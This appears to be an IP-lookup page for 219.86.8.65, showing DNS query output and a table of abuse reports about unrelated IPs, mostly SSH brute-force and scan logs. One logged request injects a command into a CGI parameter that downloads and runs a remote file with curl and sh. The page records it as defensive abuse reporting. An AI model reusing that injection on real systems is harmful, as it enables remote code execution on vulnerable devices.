城市(city): unknown
省份(region): unknown
国家(country): Republic of China (ROC)
运营商(isp): unknown
主机名(hostname): unknown
机构(organization): unknown
使用类型(Usage Type): unknown
b
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 219.86.8.65
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 13736
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;219.86.8.65. IN A
;; AUTHORITY SECTION:
. 3600 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2019052600 1800 900 604800 86400
;; Query time: 2 msec
;; SERVER: 67.207.67.2#53(67.207.67.2)
;; WHEN: Sun May 26 18:46:07 CST 2019
;; MSG SIZE rcvd: 115
65.8.86.219.in-addr.arpa domain name pointer 219-86-8-65.dynamic.tfn.net.tw.
Server: 183.60.83.19
Address: 183.60.83.19#53
Non-authoritative answer:
65.8.86.219.in-addr.arpa name = 219-86-8-65.dynamic.tfn.net.tw.
Authoritative answers can be found from:
| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 138.197.164.222 | attackspam | Sep 1 20:52:06 haigwepa sshd[6508]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.197.164.222 Sep 1 20:52:09 haigwepa sshd[6508]: Failed password for invalid user deploy from 138.197.164.222 port 59404 ssh2 ... |
2020-09-02 04:58:41 |
| 5.132.115.161 | attackbots | $f2bV_matches |
2020-09-02 05:03:54 |
| 192.241.227.232 | attackbots | GPL SNMP public access udp - port: 161 proto: snmp cat: Attempted Information Leakbytes: 85 |
2020-09-02 04:39:25 |
| 190.149.156.91 | attackspam | " " |
2020-09-02 04:48:13 |
| 1.179.148.9 | attack | Sep 1 13:26:10 shivevps sshd[27136]: Bad protocol version identification '\024' from 1.179.148.9 port 37941 ... |
2020-09-02 04:59:21 |
| 186.96.110.5 | attackspambots | Sep 1 13:26:12 shivevps sshd[27155]: Bad protocol version identification '\024' from 186.96.110.5 port 37748 ... |
2020-09-02 04:56:29 |
| 202.57.40.227 | attack | GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://5.206.227.228/zero;sh zero;" HTTP/1.0 |
2020-09-02 04:51:28 |
| 117.69.231.219 | attackbotsspam | Sep 1 13:26:14 shivevps sshd[27181]: Bad protocol version identification '\024' from 117.69.231.219 port 59724 ... |
2020-09-02 04:54:18 |
| 200.76.195.188 | attackspam | Automatic report - Port Scan Attack |
2020-09-02 05:00:52 |
| 103.139.212.213 | attackspam | 443 |
2020-09-02 05:08:44 |
| 167.249.168.131 | spambotsattackproxynormal | PAIN DOMINA Gmail YouTube Vírus 17:59 |
2020-09-02 04:59:30 |
| 167.249.168.131 | spambotsattackproxynormal | PAIN DOMINA |
2020-09-02 04:57:55 |
| 210.77.68.221 | attackspam | 2020-09-01T15:15:22.993935shield sshd\[20197\]: Invalid user test from 210.77.68.221 port 63866 2020-09-01T15:15:23.003258shield sshd\[20197\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=210.77.68.221 2020-09-01T15:15:24.793883shield sshd\[20197\]: Failed password for invalid user test from 210.77.68.221 port 63866 ssh2 2020-09-01T15:19:22.258814shield sshd\[20801\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=210.77.68.221 user=root 2020-09-01T15:19:24.191162shield sshd\[20801\]: Failed password for root from 210.77.68.221 port 63979 ssh2 |
2020-09-02 04:52:52 |
| 54.38.218.213 | attack | Sep 1 13:26:21 shivevps sshd[26622]: Did not receive identification string from 54.38.218.213 port 36729 ... |
2020-09-02 04:49:45 |
| 218.92.0.208 | attack | Sep 1 22:46:32 eventyay sshd[748]: Failed password for root from 218.92.0.208 port 20055 ssh2 Sep 1 22:46:34 eventyay sshd[748]: Failed password for root from 218.92.0.208 port 20055 ssh2 Sep 1 22:46:36 eventyay sshd[748]: Failed password for root from 218.92.0.208 port 20055 ssh2 ... |
2020-09-02 04:51:11 |